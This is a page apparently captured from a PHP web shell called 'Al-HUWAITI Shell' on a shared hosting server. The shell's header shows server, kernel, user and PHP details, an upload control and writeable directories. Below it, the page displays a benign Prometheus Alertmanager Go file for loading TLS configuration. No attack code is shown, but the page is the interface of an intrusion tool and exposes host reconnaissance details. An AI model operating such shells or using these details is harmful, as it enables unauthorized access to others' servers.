Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1112.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u451330669 ( 451330669)
PHP Version : 8.2.27
Disable Function : NONE
Directory :  /opt/go/pkg/mod/github.com/prometheus/alertmanager@v0.26.0/cluster/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/go/pkg/mod/github.com/prometheus/alertmanager@v0.26.0/cluster/tls_config.go
// Copyright 2020 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

package cluster

import (
	"fmt"
	"os"
	"path/filepath"

	"github.com/prometheus/common/config"
	"github.com/prometheus/exporter-toolkit/web"
	"gopkg.in/yaml.v2"
)

type TLSTransportConfig struct {
	TLSServerConfig *web.TLSConfig    `yaml:"tls_server_config"`
	TLSClientConfig *config.TLSConfig `yaml:"tls_client_config"`
}

func GetTLSTransportConfig(configPath string) (*TLSTransportConfig, error) {
	if configPath == "" {
		return nil, nil
	}

	bytes, err := os.ReadFile(configPath)
	if err != nil {
		return nil, err
	}

	cfg := &TLSTransportConfig{
		TLSClientConfig: &config.TLSConfig{},
	}
	if err := yaml.UnmarshalStrict(bytes, cfg); err != nil {
		return nil, err
	}

	if cfg.TLSServerConfig == nil {
		return nil, fmt.Errorf("missing 'tls_server_config' entry in the TLS configuration")
	}

	cfg.TLSServerConfig.SetDirectory(filepath.Dir(configPath))
	cfg.TLSClientConfig.SetDirectory(filepath.Dir(configPath))

	return cfg, nil
}

Al-HUWAITI Shell